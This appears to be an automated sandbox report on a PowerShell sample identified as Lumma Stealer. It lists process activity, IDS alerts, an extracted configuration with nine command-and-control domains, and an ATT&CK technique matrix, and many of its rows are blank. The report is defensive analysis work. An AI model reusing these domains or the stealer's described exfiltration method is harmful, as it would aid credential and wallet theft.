Windows
Analysis Report
92.255.57_2.112.ps1
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 7408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- RegSvcs.exe (PID: 7592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- RegSvcs.exe (PID: 7600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- RegSvcs.exe (PID: 7608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- wermgr.exe (PID: 7616 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7408" "2496" "2432" "2500" "0" "0" "2468" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | |
{"C2 url": ["curtainykeo.lat", "leggelatez.lat", "kickykiduz.lat", "savorraiykj.lat", "miniatureyu.lat", "finickypwk.lat", "bloodyswif.lat", "shoefeatthe.lat", "washyceehsu.lat"], "Build id": "atxOT1--traff12"}
Rule | Description | Author | Strings |
---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |
Rule | Description | Author | Strings |
---|---|---|---|
JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security | |
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T08:27:12.602411+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
2025-01-14T08:27:13.819855+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:14.743708+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:15.727636+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:17.659036+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:19.021812+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:20.289084+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:22.160237+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:24.845892+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:14.261530+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:15.093246+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:25.345878+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:14.261530+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:15.093246+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:11.805855+0100 | 2059189 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58984 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.927906+0100 | 2059191 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53855 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.877255+0100 | 2059199 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 64720 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.830325+0100 | 2059201 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56901 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.848565+0100 | 2059203 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60048 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.893391+0100 | 2059207 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60715 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.905812+0100 | 2059209 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 54093 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.817677+0100 | 2059211 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60549 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:18.480783+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:13.109424+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Code function: | 4_2_004182C0 | |
Source: | Code function: | 4_2_00415D15 | |
Source: | Code function: | 4_2_00418404 |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 4_2_00427A50 | |
Source: | Code function: | 4_2_0040BA29 | |
Source: | Code function: | 4_2_0040CB44 | |
Source: | Code function: | 4_2_0042D420 | |
Source: | Code function: | 4_2_00423E44 | |
Source: | Code function: | 4_2_00408740 | |
Source: | Code function: | 4_2_00429871 | |
Source: | Code function: | 4_2_0042E002 | |
Source: | Code function: | 4_2_0042E002 | |
Source: | Code function: | 4_2_0042A810 | |
Source: | Code function: | 4_2_004288BA | |
Source: | Code function: | 4_2_00402940 | |
Source: | Code function: | 4_2_0040A910 | |
Source: | Code function: | 4_2_004161DF | |
Source: | Code function: | 4_2_004251E8 | |
Source: | Code function: | 4_2_00426A00 | |
Source: | Code function: | 4_2_00438AF0 | |
Source: | Code function: | 4_2_0041AA90 | |
Source: | Code function: | 4_2_0041AA90 | |
Source: | Code function: | 4_2_004082A0 | |
Source: | Code function: | 4_2_0043EB00 | |
Source: | Code function: | 4_2_00420B10 | |
Source: | Code function: | 4_2_00440310 | |
Source: | Code function: | 4_2_004273A0 | |
Source: | Code function: | 4_2_004273A0 | |
Source: | Code function: | 4_2_004273A0 | |
Source: | Code function: | 4_2_0041DC40 | |
Source: | Code function: | 4_2_00417451 | |
Source: | Code function: | 4_2_00407400 | |
Source: | Code function: | 4_2_00407400 | |
Source: | Code function: | 4_2_0043C410 | |
Source: | Code function: | 4_2_0043C410 | |
Source: | Code function: | 4_2_00415C25 | |
Source: | Code function: | 4_2_0042B430 | |
Source: | Code function: | 4_2_00408CD0 | |
Source: | Code function: | 4_2_00426D70 | |
Source: | Code function: | 4_2_0042DD30 | |
Source: | Code function: | 4_2_0042E5C2 | |
Source: | Code function: | 4_2_004165EE | |
Source: | Code function: | 4_2_00415590 | |
Source: | Code function: | 4_2_004095A0 | |
Source: | Code function: | 4_2_00415E42 | |
Source: | Code function: | 4_2_00413E50 | |
Source: | Code function: | 4_2_0040DE72 | |
Source: | Code function: | 4_2_00425E00 | |
Source: | Code function: | 4_2_00425E00 | |
Source: | Code function: | 4_2_0043EE10 | |
Source: | Code function: | 4_2_00408EB0 | |
Source: | Code function: | 4_2_0041DEB0 | |
Source: | Code function: | 4_2_0041F710 | |
Source: | Code function: | 4_2_0041F710 | |
Source: | Code function: | 4_2_004427E0 | |
Source: | Code function: | 4_2_0042E7EB | |
Source: | Code function: | 4_2_0040DFEA | |
Source: | Code function: | 4_2_0042F799 | |
Source: | Code function: | 4_2_0042DFAF |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 4_2_004363E0 |
Source: | Code function: | 4_2_004363E0 |
Source: | Code function: | 4_2_00436590 |
Source: | Window created: | Jump to behavior |
Source: | Code function: | 0_2_00007FFD9B8A6232 | |
Source: | Code function: | 0_2_00007FFD9B8AA769 | |
Source: | Code function: | 0_2_00007FFD9B8AA7A0 | |
Source: | Code function: | 0_2_00007FFD9B970FA4 | |
Source: | Code function: | 4_2_00415975 | |
Source: | Code function: | 4_2_00427A50 | |
Source: | Code function: | 4_2_00440A0D | |
Source: | Code function: | 4_2_00420440 | |
Source: | Code function: | 4_2_00410446 | |
Source: | Code function: | 4_2_00442460 | |
Source: | Code function: | 4_2_00442DE0 | |
Source: | Code function: | 4_2_00423E44 | |
Source: | Code function: | 4_2_0040AE60 | |
Source: | Code function: | 4_2_0042DEE5 | |
Source: | Code function: | 4_2_0040D690 | |
Source: | Code function: | 4_2_00408740 | |
Source: | Code function: | 4_2_0043B7B0 | |
Source: | Code function: | 4_2_00430050 | |
Source: | Code function: | 4_2_00411078 | |
Source: | Code function: | 4_2_0042A810 | |
Source: | Code function: | 4_2_00433810 | |
Source: | Code function: | 4_2_004270D0 | |
Source: | Code function: | 4_2_004058E0 | |
Source: | Code function: | 4_2_0042D893 | |
Source: | Code function: | 4_2_004148B0 | |
Source: | Code function: | 4_2_004288BA | |
Source: | Code function: | 4_2_00436140 | |
Source: | Code function: | 4_2_0040A910 | |
Source: | Code function: | 4_2_00441910 | |
Source: | Code function: | 4_2_00403920 | |
Source: | Code function: | 4_2_0043912C | |
Source: | Code function: | 4_2_004091C0 | |
Source: | Code function: | 4_2_004161DF | |
Source: | Code function: | 4_2_004311E6 | |
Source: | Code function: | 4_2_00432188 | |
Source: | Code function: | 4_2_00406190 | |
Source: | Code function: | 4_2_0042F195 | |
Source: | Code function: | 4_2_004421B0 | |
Source: | Code function: | 4_2_0041E250 | |
Source: | Code function: | 4_2_00441A56 | |
Source: | Code function: | 4_2_0041B200 | |
Source: | Code function: | 4_2_004042D0 | |
Source: | Code function: | 4_2_0041BAD0 | |
Source: | Code function: | 4_2_00433AD0 | |
Source: | Code function: | 4_2_00431A88 | |
Source: | Code function: | 4_2_00441A94 | |
Source: | Code function: | 4_2_0041AA90 | |
Source: | Code function: | 4_2_00442A90 | |
Source: | Code function: | 4_2_004082A0 | |
Source: | Code function: | 4_2_0041CAA0 | |
Source: | Code function: | 4_2_0043CAA7 | |
Source: | Code function: | 4_2_004412B1 | |
Source: | Code function: | 4_2_00441B40 | |
Source: | Code function: | 4_2_0041C370 | |
Source: | Code function: | 4_2_00420B10 | |
Source: | Code function: | 4_2_00402B20 | |
Source: | Code function: | 4_2_00411B20 | |
Source: | Code function: | 4_2_0042ABC0 | |
Source: | Code function: | 4_2_00441BD0 | |
Source: | Code function: | 4_2_004273A0 | |
Source: | Code function: | 4_2_0043AC40 | |
Source: | Code function: | 4_2_00417451 | |
Source: | Code function: | 4_2_00441C60 | |
Source: | Code function: | 4_2_00419470 | |
Source: | Code function: | 4_2_00407400 | |
Source: | Code function: | 4_2_00404C00 | |
Source: | Code function: | 4_2_0043C410 | |
Source: | Code function: | 4_2_0042ECD0 | |
Source: | Code function: | 4_2_00439CD8 | |
Source: | Code function: | 4_2_00440CD8 | |
Source: | Code function: | 4_2_00414C9C | |
Source: | Code function: | 4_2_0042CCA0 | |
Source: | Code function: | 4_2_0040E4B0 | |
Source: | Code function: | 4_2_00426D70 | |
Source: | Code function: | 4_2_00428D76 | |
Source: | Code function: | 4_2_00422D17 | |
Source: | Code function: | 4_2_004245C0 | |
Source: | Code function: | 4_2_004165EE | |
Source: | Code function: | 4_2_00415590 | |
Source: | Code function: | 4_2_004095A0 | |
Source: | Code function: | 4_2_00415E42 | |
Source: | Code function: | 4_2_00413E50 | |
Source: | Code function: | 4_2_0041BE00 | |
Source: | Code function: | 4_2_00406620 | |
Source: | Code function: | 4_2_00402EF0 | |
Source: | Code function: | 4_2_0043EE80 | |
Source: | Code function: | 4_2_0043AEA0 | |
Source: | Code function: | 4_2_0043974A | |
Source: | Code function: | 4_2_00419710 | |
Source: | Code function: | 4_2_0041F710 | |
Source: | Code function: | 4_2_0041C7D0 | |
Source: | Code function: | 4_2_004427E0 | |
Source: | Code function: | 4_2_00427F8D |
Source: | Classification label: |
Source: | Code function: | 4_2_0043B7B0 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Source: | Code function: | 0_2_00007FFD9B8A09C9 | |
Source: | Code function: | 0_2_00007FFD9B8AD5D3 | |
Source: | Code function: | 0_2_00007FFD9B972B59 | |
Source: | Code function: | 4_2_00441864 | |
Source: | Code function: | 4_2_0043A6FE |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 4_2_004402D0 |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | String found in binary or memory: | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | String found in binary or memory: | ||
Source: | File opened: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 231 Security Software Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 231 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 231 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 41 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 3 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 12 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 32 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 7% | Virustotal | | Browse |
| 11% | ReversingLabs | | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 100% | Avira URL Cloud | malware | |
| 100% | Avira URL Cloud | malware | |
| 100% | Avira URL Cloud | malware | |
| 0% | Avira URL Cloud | safe | |
| 100% | Avira URL Cloud | malware | |
| 100% | Avira URL Cloud | malware | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 100% | Avira URL Cloud | malware | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 100% | Avira URL Cloud | malware | |
| 100% | Avira URL Cloud | malware | |
| 100% | Avira URL Cloud | malware | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
